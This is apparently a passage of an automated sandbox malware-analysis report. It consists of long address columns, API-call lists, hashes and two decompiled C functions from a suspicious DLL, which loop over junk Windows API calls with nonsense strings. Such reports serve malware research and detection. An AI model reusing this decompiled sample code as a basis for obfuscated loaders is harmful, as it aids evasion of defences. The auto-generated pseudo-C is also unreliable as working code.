                                                                                                                                    0x100029b4
                                                                                                                                    0x100029c0
                                                                                                                                    0x100029c0
                                                                                                                                    0x100029c3
                                                                                                                                    0x100029c7
                                                                                                                                    0x100029d1
                                                                                                                                    0x100029d8
                                                                                                                                    0x100029d8
                                                                                                                                    0x00000000
                                                                                                                                    0x100029c0
                                                                                                                                    0x100029b2
                                                                                                                                    0x100028d1
                                                                                                                                    0x100028d1
                                                                                                                                    0x100028d7
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x100028e0
                                                                                                                                    0x100028e2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x100028e4
                                                                                                                                    0x100028e7
                                                                                                                                    0x100028ea
                                                                                                                                    0x100028ec
                                                                                                                                    0x100028f3
                                                                                                                                    0x100028fd
                                                                                                                                    0x10002903
                                                                                                                                    0x1000290a
                                                                                                                                    0x1000290f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1000290f
                                                                                                                                    0x00000000
                                                                                                                                    0x100028d1
                                                                                                                                    0x10002870
                                                                                                                                    0x10002870
                                                                                                                                    0x10002872
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1000287b
                                                                                                                                    0x1000287d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1000287f
                                                                                                                                    0x10002882
                                                                                                                                    0x10002885
                                                                                                                                    0x1000288b
                                                                                                                                    0x10002890
                                                                                                                                    0x10002895
                                                                                                                                    0x1000289b
                                                                                                                                    0x100028a1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x100028a1
                                                                                                                                    0x00000000
                                                                                                                                    0x1000280c
                                                                                                                                    0x10002820
                                                                                                                                    0x10002820
                                                                                                                                    0x10002822
                                                                                                                                    0x10002825
                                                                                                                                    0x1000282b
                                                                                                                                    0x10002832
                                                                                                                                    0x10002832
                                                                                                                                    0x00000000
                                                                                                                                    0x10002820
                                                                                                                                    0x1000280a
                                                                                                                                    0x100027a5
                                                                                                                                    0x100027a5
                                                                                                                                    0x100027a9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x100027ab
                                                                                                                                    0x100027ae
                                                                                                                                    0x100027b1
                                                                                                                                    0x100027b4
                                                                                                                                    0x100027ba
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x100027ba
                                                                                                                                    0x00000000
                                                                                                                                    0x100027a5
                                                                                                                                    0x10002756
                                                                                                                                    0x1000275c
                                                                                                                                    0x10002762
                                                                                                                                    0x10002762
                                                                                                                                    0x10002766
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1000276c
                                                                                                                                    0x1000276f
                                                                                                                                    0x10002779
                                                                                                                                    0x1000277b
                                                                                                                                    0x1000277b
                                                                                                                                    0x10002785
                                                                                                                                    0x1000278b
                                                                                                                                    0x1000278e
                                                                                                                                    0x10002790
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002790
                                                                                                                                    0x00000000
                                                                                                                                    0x1000271b
                                                                                                                                    0x1000271b
                                                                                                                                    0x10002723
                                                                                                                                    0x10002723
                                                                                                                                    0x10002725
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002727
                                                                                                                                    0x1000272c
                                                                                                                                    0x10002732
                                                                                                                                    0x10002736
                                                                                                                                    0x1000273c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1000273c
                                                                                                                                    0x00000000
                                                                                                                                    0x10002723
                                                                                                                                    0x10002719
                                                                                                                                    0x100026be
                                                                                                                                    0x100026d0
                                                                                                                                    0x100026d0
                                                                                                                                    0x100026d0
                                                                                                                                    0x100026d3
                                                                                                                                    0x100026d3
                                                                                                                                    0x00000000
                                                                                                                                    0x100026d0
                                                                                                                                    0x10002662
                                                                                                                                    0x10002669
                                                                                                                                    0x10002675
                                                                                                                                    0x10002675
                                                                                                                                    0x1000267b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1000267d
                                                                                                                                    0x10002680
                                                                                                                                    0x10002686
                                                                                                                                    0x10002695
                                                                                                                                    0x10002697
                                                                                                                                    0x10002699
                                                                                                                                    0x10002699
                                                                                                                                    0x10002697
                                                                                                                                    0x100026a0
                                                                                                                                    0x100026a3
                                                                                                                                    0x100026a6
                                                                                                                                    0x100026aa
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x100026aa
                                                                                                                                    0x00000000
                                                                                                                                    0x10002675
                                                                                                                                    0x1000260e
                                                                                                                                    0x10002614
                                                                                                                                    0x10002614
                                                                                                                                    0x10002619
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1000261b
                                                                                                                                    0x1000261f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002621
                                                                                                                                    0x10002624
                                                                                                                                    0x10002626
                                                                                                                                    0x1000262c
                                                                                                                                    0x1000262e
                                                                                                                                    0x10002635
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002635
                                                                                                                                    0x00000000
                                                                                                                                    0x10002614
                                                                                                                                    0x100025c3
                                                                                                                                    0x100025c8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x100025ca
                                                                                                                                    0x100025ca
                                                                                                                                    0x100025cc
                                                                                                                                    0x100025cf
                                                                                                                                    0x100025d6
                                                                                                                                    0x100025d6
                                                                                                                                    0x100025b0
                                                                                                                                    0x10002575
                                                                                                                                    0x10002580
                                                                                                                                    0x10002580
                                                                                                                                    0x10002584
                                                                                                                                    0x10002589
                                                                                                                                    0x10002589
                                                                                                                                    0x00000000
                                                                                                                                    0x10002540
                                                                                                                                    0x10002540
                                                                                                                                    0x10002540
                                                                                                                                    0x10002546
                                                                                                                                    0x10002548
                                                                                                                                    0x10002548
                                                                                                                                    0x00000000
                                                                                                                                    0x10002540
                                                                                                                                    0x1000253c
                                                                                                                                    0x100024a7
                                                                                                                                    0x100024b1
                                                                                                                                    0x100024b7
                                                                                                                                    0x100024b7
                                                                                                                                    0x100024bb
                                                                                                                                    0x100024c0
                                                                                                                                    0x100024c3
                                                                                                                                    0x100024c9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x100024cb
                                                                                                                                    0x100024d1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x100024d3
                                                                                                                                    0x100024d6
                                                                                                                                    0x100024d9
                                                                                                                                    0x100024db
                                                                                                                                    0x100024df
                                                                                                                                    0x100024e1
                                                                                                                                    0x100024e8
                                                                                                                                    0x100024ea
                                                                                                                                    0x100024ea
                                                                                                                                    0x100024f1
                                                                                                                                    0x100024f6
                                                                                                                                    0x100024f9
                                                                                                                                    0x100024fc
                                                                                                                                    0x10002501
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002501
                                                                                                                                    0x00000000
                                                                                                                                    0x100024c0
                                                                                                                                    0x10002453
                                                                                                                                    0x10002456
                                                                                                                                    0x1000245c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1000245e
                                                                                                                                    0x10002461
                                                                                                                                    0x10002464
                                                                                                                                    0x10002466
                                                                                                                                    0x1000246c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1000246c
                                                                                                                                    0x00000000
                                                                                                                                    0x10002453
                                                                                                                                    0x00000000
                                                                                                                                    0x10002417
                                                                                                                                    0x1000240e
                                                                                                                                    0x100023c0
                                                                                                                                    0x100023c0
                                                                                                                                    0x100023c3
                                                                                                                                    0x100023c8
                                                                                                                                    0x100023ce
                                                                                                                                    0x100023ce
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002373
                                                                                                                                    0x10002373
                                                                                                                                    0x10002373
                                                                                                                                    0x10002379
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1000237b
                                                                                                                                    0x10002381
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002383
                                                                                                                                    0x10002388
                                                                                                                                    0x1000238a
                                                                                                                                    0x1000238e
                                                                                                                                    0x10002394
                                                                                                                                    0x10002399
                                                                                                                                    0x1000239b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1000239b
                                                                                                                                    0x1000239d
                                                                                                                                    0x00000000
                                                                                                                                    0x10002311
                                                                                                                                    0x10002311
                                                                                                                                    0x1000231c
                                                                                                                                    0x1000231c
                                                                                                                                    0x1000231e
                                                                                                                                    0x10002330
                                                                                                                                    0x10002330
                                                                                                                                    0x10002333
                                                                                                                                    0x1000233a
                                                                                                                                    0x10002341
                                                                                                                                    0x10002347
                                                                                                                                    0x10002347
                                                                                                                                    0x00000000
                                                                                                                                    0x10002347
                                                                                                                                    0x10002343
                                                                                                                                    0x10002345
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1000234d
                                                                                                                                    0x1000234d
                                                                                                                                    0x1000234d
                                                                                                                                    0x1000234d
                                                                                                                                    0x00000000
                                                                                                                                    0x10002330
                                                                                                                                    0x1000230f
                                                                                                                                    0x100022c0
                                                                                                                                    0x100022c0
                                                                                                                                    0x100022c6
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x100022c8
                                                                                                                                    0x100022cb
                                                                                                                                    0x100022ce
                                                                                                                                    0x100022d2
                                                                                                                                    0x100022d6
                                                                                                                                    0x100022dd
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x100022dd
                                                                                                                                    0x100022df
                                                                                                                                    0x00000000
                                                                                                                                    0x100022df
                                                                                                                                    0x10002254
                                                                                                                                    0x1000225a
                                                                                                                                    0x10002260
                                                                                                                                    0x10002260
                                                                                                                                    0x10002263
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002268
                                                                                                                                    0x1000226a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002271
                                                                                                                                    0x10002277
                                                                                                                                    0x1000227a
                                                                                                                                    0x1000227c
                                                                                                                                    0x1000227f
                                                                                                                                    0x10002286
                                                                                                                                    0x10002290
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002290
                                                                                                                                    0x00000000
                                                                                                                                    0x10002260
                                                                                                                                    0x10002210
                                                                                                                                    0x10002214
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002216
                                                                                                                                    0x10002216
                                                                                                                                    0x10002219
                                                                                                                                    0x1000221f
                                                                                                                                    0x10002226
                                                                                                                                    0x1000222c
                                                                                                                                    0x1000222c
                                                                                                                                    0x10001f9c
                                                                                                                                    0x10001f9c
                                                                                                                                    0x10001fa2
                                                                                                                                    0x10001fa2
                                                                                                                                    0x10001fa4
                                                                                                                                    0x10001fa7
                                                                                                                                    0x10001fae
                                                                                                                                    0x10001fae
                                                                                                                                    0x00000000
                                                                                                                                    0x10001fa2
                                                                                                                                    0x10001cd2
                                                                                                                                    0x10001cd4
                                                                                                                                    0x10001cd4
                                                                                                                                    0x10001ce0
                                                                                                                                    0x10001ce0
                                                                                                                                    0x10001ce0
                                                                                                                                    0x10001ce3
                                                                                                                                    0x10001ce9
                                                                                                                                    0x10001ce9
                                                                                                                                    0x00000000
                                                                                                                                    0x10001ce0
                                                                                                                                    0x10001cd0
                                                                                                                                    0x10001bf5
                                                                                                                                    0x10001bfc
                                                                                                                                    0x10001bff
                                                                                                                                    0x10001c04
                                                                                                                                    0x10001c0a
                                                                                                                                    0x10001c11
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10001c11
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,CloseFarmhouse32,00000086,_DrawPossible64,00000086,?,?,000000C1,000000C1), ref: 10001D67
                                                                                                                                    • closesocket.WS2_32(0000014A), ref: 10001D6E
                                                                                                                                    • CoRevokeClassObject.OLE32(0000014A), ref: 10001D75
                                                                                                                                    • CoFileTimeNow.OLE32(?), ref: 10001D7C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.687872325.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.687869167.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687877691.000000001000A000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687880940.000000001000C000.00000008.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687883756.000000001000D000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687887976.0000000010010000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClassCreateFileObjectRevokeTimeclosesocket
                                                                                                                                    • String ID: 2$3$A$CloseFarmhouse32$EnumMicrophyte32$Erodium$SeemNicotinamide32$StandMarmite$TakePenult32$V$_DrawPossible64$c$e$e$i$k$l$l$l$l$n$o$ps$r$r$t$u
                                                                                                                                    • API String ID: 769704860-91181023
                                                                                                                                    • Opcode ID: 6a5b50da9a18bc4620d4d740d753d8a4242cd2b0910a8c730c5ca6e004029671
                                                                                                                                    • Instruction ID: d7a533ed34c0357ead6766cc085aedc84edb46e692d9504d8a6007d1625a7fff
                                                                                                                                    • Opcode Fuzzy Hash: 6a5b50da9a18bc4620d4d740d753d8a4242cd2b0910a8c730c5ca6e004029671
                                                                                                                                    • Instruction Fuzzy Hash: 0B92DF755083A18BF304CF24CCC4AAA7BE5F799380F04892EE985973ADD7749D84CB62
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10002C30, Relevance: 37.0, APIs: 14, Strings: 7, Instructions: 201fileregistrypipeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 59%
                                                                                                                                    			E10002C30() {
				signed int _v8;
				signed int _v64;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v78;
				short _v80;
				char _v84;
				intOrPtr _v88;
				struct _SECURITY_ATTRIBUTES _v92;
				char _v96;
				void _v100;
				void* _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				char _v136;
				void* _v148;
				void* _v152;
				void _v156;
				long _v160;
				long _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				int _t74;
				struct _SECURITY_ATTRIBUTES _t86;
				short _t87;
				intOrPtr _t95;
				char _t96;
				char _t97;
				intOrPtr _t98;
				intOrPtr* _t114;
				void* _t115;
				CHAR* _t121;
				intOrPtr _t124;
				char _t125;
				intOrPtr _t129;
				intOrPtr _t130;
				char _t131;
				intOrPtr _t132;
				intOrPtr _t139;
				char _t150;
				char _t151;
				char _t155;
				intOrPtr _t157;
				char _t158;
				intOrPtr* _t168;
				void* _t169;
				void* _t172;
				signed int _t173;

				_t175 = (_t173 & 0xfffffff8) - 0x6c;
				_t72 =  *0x1000e420; // 0x44ea7bf2
				_v8 = _t72 ^ (_t173 & 0xfffffff8) - 0x0000006c;
				_t114 = __imp__CoRevokeClassObject;
				_t74 = 0x86;
				_t168 = __imp__#3; // 0x73eced70
				_v108 = 0x14a;
				_v104 = 0x86;
				_v100 = 0xc1;
				_v96 = 0x4be;
				while(1) {
					RegCreateKeyExW( &_v100, L"CloseFarmhouse32", _t74, L"_DrawPossible64", _t74,  &_v100,  &_v92,  &_v104,  &_v100);
					 *_t168( &_v108);
					 *_t114(_v112);
					__imp__CoFileTimeNow( &_v112);
					_t121 =  &_v120;
					__imp__CoInitializeSecurity( &_v116, _t121, _t121,  &_v112, _v120, _v112,  &_v116, _v116,  &_v120);
					CreatePrivateObjectSecurity( &_v148,  &_v156,  &_v156,  &_v148,  &_v156, _t122); // executed
					DisconnectNamedPipe( &_v148);
					_t150 = "SeemNicotinamide32"; // 0x6d656553
					_t86 = M1000A1F4; // 0x6f63694e
					_t124 = M1000A1F8; // 0x616e6974
					_v96 = _t150;
					_t151 = M1000A1FC; // 0x6564696d
					_v92 = _t86;
					_t87 =  *0x1000a200; // 0x3233
					_v84 = _t151;
					_v88 = _t124;
					_t125 =  *0x1000a202; // 0x0
					_v80 = _t87;
					_v78 = _t125;
					EnumResourceNamesA( &_v156,  &_v96,  &_v152,  &_v148);
					EnumResourceTypesW( &_v160,  &_v160,  &_v152);
					LockFile( &_v156, _v156, _v164, _v164, _v164);
					_t155 = "StandMarmite"; // 0x6e617453
					_t95 = M1000A1E4; // 0x72614d64
					_t129 =  *0x1000a1e8; // 0x6574696d
					_v136 = _t155;
					_v132 = _t95;
					_t96 = "TakePenult32"; // 0x656b6154
					_v128 = _t129;
					_t130 = M1000A1D4; // 0x756e6550
					_v124 =  *0x1000a1ec & 0x000000ff;
					_t157 =  *0x1000a1d8; // 0x3233746c
					_v120 = _t96;
					_t97 =  *0x1000a1dc; // 0x0
					_v116 = _t130;
					_t131 = "EnumMicrophyte32"; // 0x6d756e45
					_v112 = _t157;
					_t158 = M1000A1C0; // 0x7263694d
					_v108 = _t97;
					_t98 = M1000A1C4; // 0x7968706f
					_v84 = _t131;
					_t132 =  *0x1000a1c8; // 0x32336574
					_v80 = _t158;
					_v76 = _t98;
					_v72 = _t132;
					_v68 =  *0x1000a1cc & 0x000000ff;
					LookupPrivilegeDisplayNameA( &_v136,  &_v120,  &_v84,  &_v160,  &_v164); // executed
					ReadEventLogW( &_v164, _v160, _v164,  &_v164, _v164,  &_v164,  &_v156);
					SetupComm( &_v164, _v164, _v156);
					WriteFile( &_v156,  &_v156, _v164,  &_v164,  &_v164); // executed
					_t69 =  &_v152;
					 *_t69 = _v152 - 1;
					if( *_t69 == 0) {
						break;
					}
					_t74 = _v160;
				}
				_t139 =  *0x1000e350; // 0x13a
				_t166 =  *0x1000e3c4;
				if( *0x1000e3c4 >= _t139 -  *0x1000e368) {
					 *0x1000e14c = 0xb0e;
				}
				_pop(_t169);
				_pop(_t172);
				_pop(_t115);
				return E10002ECD(1, _t115, _v64 ^ _t175, _t166, _t169, _t172);
			}



























































                                                                                                                                    0x10002c36
                                                                                                                                    0x10002c39
                                                                                                                                    0x10002c40
                                                                                                                                    0x10002c45
                                                                                                                                    0x10002c52
                                                                                                                                    0x10002c58
                                                                                                                                    0x10002c5e
                                                                                                                                    0x10002c66
                                                                                                                                    0x10002c6a
                                                                                                                                    0x10002c72
                                                                                                                                    0x10002c84
                                                                                                                                    0x10002ca7
                                                                                                                                    0x10002cae
                                                                                                                                    0x10002cb5
                                                                                                                                    0x10002cbc
                                                                                                                                    0x10002ce0
                                                                                                                                    0x10002ced
                                                                                                                                    0x10002d03
                                                                                                                                    0x10002d0e
                                                                                                                                    0x10002d14
                                                                                                                                    0x10002d1a
                                                                                                                                    0x10002d1f
                                                                                                                                    0x10002d25
                                                                                                                                    0x10002d29
                                                                                                                                    0x10002d2f
                                                                                                                                    0x10002d33
                                                                                                                                    0x10002d39
                                                                                                                                    0x10002d3d
                                                                                                                                    0x10002d41
                                                                                                                                    0x10002d4c
                                                                                                                                    0x10002d55
                                                                                                                                    0x10002d64
                                                                                                                                    0x10002d77
                                                                                                                                    0x10002d8e
                                                                                                                                    0x10002d94
                                                                                                                                    0x10002d9a
                                                                                                                                    0x10002d9f
                                                                                                                                    0x10002da5
                                                                                                                                    0x10002db0
                                                                                                                                    0x10002db4
                                                                                                                                    0x10002db9
                                                                                                                                    0x10002dbd
                                                                                                                                    0x10002dc3
                                                                                                                                    0x10002dc7
                                                                                                                                    0x10002dcd
                                                                                                                                    0x10002dd1
                                                                                                                                    0x10002dd6
                                                                                                                                    0x10002dda
                                                                                                                                    0x10002de0
                                                                                                                                    0x10002de4
                                                                                                                                    0x10002dea
                                                                                                                                    0x10002dee
                                                                                                                                    0x10002df3
                                                                                                                                    0x10002df7
                                                                                                                                    0x10002dfd
                                                                                                                                    0x10002e08
                                                                                                                                    0x10002e0c
                                                                                                                                    0x10002e1a
                                                                                                                                    0x10002e2d
                                                                                                                                    0x10002e50
                                                                                                                                    0x10002e65
                                                                                                                                    0x10002e80
                                                                                                                                    0x10002e86
                                                                                                                                    0x10002e86
                                                                                                                                    0x10002e8b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002c80
                                                                                                                                    0x10002c80
                                                                                                                                    0x10002e98
                                                                                                                                    0x10002e9e
                                                                                                                                    0x10002eae
                                                                                                                                    0x10002eb0
                                                                                                                                    0x10002eb0
                                                                                                                                    0x10002ebd
                                                                                                                                    0x10002ebe
                                                                                                                                    0x10002ebf
                                                                                                                                    0x10002eca

                                                                                                                                    APIs
                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,CloseFarmhouse32,00000086,_DrawPossible64,00000086,?,?,000000C1,000000C1), ref: 10002CA7
                                                                                                                                    • closesocket.WS2_32(0000014A), ref: 10002CAE
                                                                                                                                    • CoRevokeClassObject.OLE32(0000014A), ref: 10002CB5
                                                                                                                                    • CoFileTimeNow.OLE32(?), ref: 10002CBC
                                                                                                                                    • CoInitializeSecurity.OLE32(?,?,?,?,000000C1,?,?,?,0000014A), ref: 10002CED
                                                                                                                                    • CreatePrivateObjectSecurity.KERNELBASE(?,0000014A,0000014A,?,0000014A,0000014A), ref: 10002D03
                                                                                                                                    • DisconnectNamedPipe.KERNELBASE(000000C1), ref: 10002D0E
                                                                                                                                    • EnumResourceNamesA.KERNEL32(?,?,000000C1,000000C1), ref: 10002D64
                                                                                                                                    • EnumResourceTypesW.KERNEL32(?,?,000000C1), ref: 10002D77
                                                                                                                                    • LockFile.KERNEL32(?,?,0000014A,0000014A,0000014A), ref: 10002D8E
                                                                                                                                    • LookupPrivilegeDisplayNameA.ADVAPI32(?,?,?,000000C1,0000014A), ref: 10002E2D
                                                                                                                                    • ReadEventLogW.ADVAPI32(?,000000C1,000000C1,?,000000C1,?,000000C1), ref: 10002E50
                                                                                                                                    • SetupComm.KERNEL32(000000C1,0000014A,000000C1), ref: 10002E65
                                                                                                                                    • WriteFile.KERNELBASE(?,?,0000014A,0000014A,0000014A), ref: 10002E80
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.687872325.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.687869167.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687877691.000000001000A000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687880940.000000001000C000.00000008.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687883756.000000001000D000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687887976.0000000010010000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CreateEnumObjectResourceSecurity$ClassCommDisconnectDisplayEventInitializeLockLookupNameNamedNamesPipePrivatePrivilegeReadRevokeSetupTimeTypesWriteclosesocket
                                                                                                                                    • String ID: CloseFarmhouse32$EnumMicrophyte32$SeemNicotinamide32$StandMarmite$TakePenult32$_DrawPossible64$ps
                                                                                                                                    • API String ID: 3842444896-518994227
                                                                                                                                    • Opcode ID: 9be607a9c30f1dc462925bd8c6da3221bc20c9a2c9e65bab476b936ed2a92c01
                                                                                                                                    • Instruction ID: 947adcdb501bdb38e5136524d9c40120a5182d8553022d98caa5c4c0717f626f
                                                                                                                                    • Opcode Fuzzy Hash: 9be607a9c30f1dc462925bd8c6da3221bc20c9a2c9e65bab476b936ed2a92c01
                                                                                                                                    • Instruction Fuzzy Hash: EA81C8B55083559FE304CF54C884CABBBF9FBD9740F008A1EF59583264D634E989CBA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10002C7C, Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 183fileregistrypipeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                    			E10002C7C(intOrPtr* __ebx, intOrPtr* __edi, void* __ebp, char _a4, char _a8, char _a12, char _a16, void* _a20, void _a24, char _a28, struct _SECURITY_ATTRIBUTES _a32, intOrPtr _a36, char _a40, short _a44, char _a46, intOrPtr _a48, intOrPtr _a52, char _a56, signed int _a60) {
				char _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				void* _v24;
				void* _v28;
				void _v32;
				long _v36;
				long _v40;
				int _t67;
				struct _SECURITY_ATTRIBUTES _t79;
				short _t80;
				intOrPtr _t88;
				char _t89;
				char _t90;
				intOrPtr _t91;
				intOrPtr* _t106;
				void* _t107;
				CHAR* _t113;
				intOrPtr _t116;
				char _t117;
				intOrPtr _t121;
				intOrPtr _t122;
				char _t123;
				intOrPtr _t124;
				intOrPtr _t131;
				char _t142;
				char _t143;
				char _t147;
				intOrPtr _t149;
				char _t150;
				intOrPtr* _t159;
				void* _t160;
				void* _t161;
				signed int _t164;

				_t159 = __edi;
				_t106 = __ebx;
				do {
					_t67 = _a20;
					RegCreateKeyExW( &_a24, L"CloseFarmhouse32", _t67, L"_DrawPossible64", _t67,  &_a24,  &_a32,  &_a20,  &_a24);
					 *_t159( &_a16);
					 *_t106(_a12);
					__imp__CoFileTimeNow( &_a12);
					_t113 =  &_a4;
					__imp__CoInitializeSecurity( &_a8, _t113, _t113,  &_a12, _a4, _a12,  &_a8, _a8,  &_a4);
					CreatePrivateObjectSecurity( &_v24,  &_v32,  &_v32,  &_v24,  &_v32, _t114); // executed
					DisconnectNamedPipe( &_v24);
					_t142 = "SeemNicotinamide32"; // 0x6d656553
					_t79 = M1000A1F4; // 0x6f63694e
					_t116 = M1000A1F8; // 0x616e6974
					_a28 = _t142;
					_t143 = M1000A1FC; // 0x6564696d
					_a32 = _t79;
					_t80 =  *0x1000a200; // 0x3233
					_a40 = _t143;
					_a36 = _t116;
					_t117 =  *0x1000a202; // 0x0
					_a44 = _t80;
					_a46 = _t117;
					EnumResourceNamesA( &_v32,  &_a28,  &_v28,  &_v24);
					EnumResourceTypesW( &_v36,  &_v36,  &_v28);
					LockFile( &_v32, _v32, _v40, _v40, _v40);
					_t147 = "StandMarmite"; // 0x6e617453
					_t88 = M1000A1E4; // 0x72614d64
					_t121 =  *0x1000a1e8; // 0x6574696d
					_v12 = _t147;
					_v8 = _t88;
					_t89 = "TakePenult32"; // 0x656b6154
					_v4 = _t121;
					_t122 = M1000A1D4; // 0x756e6550
					_v0 =  *0x1000a1ec & 0x000000ff;
					_t149 =  *0x1000a1d8; // 0x3233746c
					_a4 = _t89;
					_t90 =  *0x1000a1dc; // 0x0
					_a8 = _t122;
					_t123 = "EnumMicrophyte32"; // 0x6d756e45
					_a12 = _t149;
					_t150 = M1000A1C0; // 0x7263694d
					_a16 = _t90;
					_t91 = M1000A1C4; // 0x7968706f
					_a40 = _t123;
					_t124 =  *0x1000a1c8; // 0x32336574
					_a44 = _t150;
					_a48 = _t91;
					_a52 = _t124;
					_a56 =  *0x1000a1cc & 0x000000ff;
					LookupPrivilegeDisplayNameA( &_v12,  &_a4,  &_a40,  &_v36,  &_v40); // executed
					ReadEventLogW( &_v40, _v36, _v40,  &_v40, _v40,  &_v40,  &_v32);
					SetupComm( &_v40, _v40, _v32);
					WriteFile( &_v32,  &_v32, _v40,  &_v40,  &_v40); // executed
					_t64 =  &_v28;
					 *_t64 = _v28 - 1;
				} while ( *_t64 != 0);
				_t131 =  *0x1000e350; // 0x13a
				_t158 =  *0x1000e3c4;
				if( *0x1000e3c4 >= _t131 -  *0x1000e368) {
					 *0x1000e14c = 0xb0e;
				}
				_pop(_t160);
				_pop(_t161);
				_pop(_t107);
				return E10002ECD(1, _t107, _a60 ^ _t164, _t158, _t160, _t161);
			}






































                                                                                                                                    0x10002c7c
                                                                                                                                    0x10002c7c
                                                                                                                                    0x10002c80
                                                                                                                                    0x10002c80
                                                                                                                                    0x10002ca7
                                                                                                                                    0x10002cae
                                                                                                                                    0x10002cb5
                                                                                                                                    0x10002cbc
                                                                                                                                    0x10002ce0
                                                                                                                                    0x10002ced
                                                                                                                                    0x10002d03
                                                                                                                                    0x10002d0e
                                                                                                                                    0x10002d14
                                                                                                                                    0x10002d1a
                                                                                                                                    0x10002d1f
                                                                                                                                    0x10002d25
                                                                                                                                    0x10002d29
                                                                                                                                    0x10002d2f
                                                                                                                                    0x10002d33
                                                                                                                                    0x10002d39
                                                                                                                                    0x10002d3d
                                                                                                                                    0x10002d41
                                                                                                                                    0x10002d4c
                                                                                                                                    0x10002d55
                                                                                                                                    0x10002d64
                                                                                                                                    0x10002d77
                                                                                                                                    0x10002d8e
                                                                                                                                    0x10002d94
                                                                                                                                    0x10002d9a
                                                                                                                                    0x10002d9f
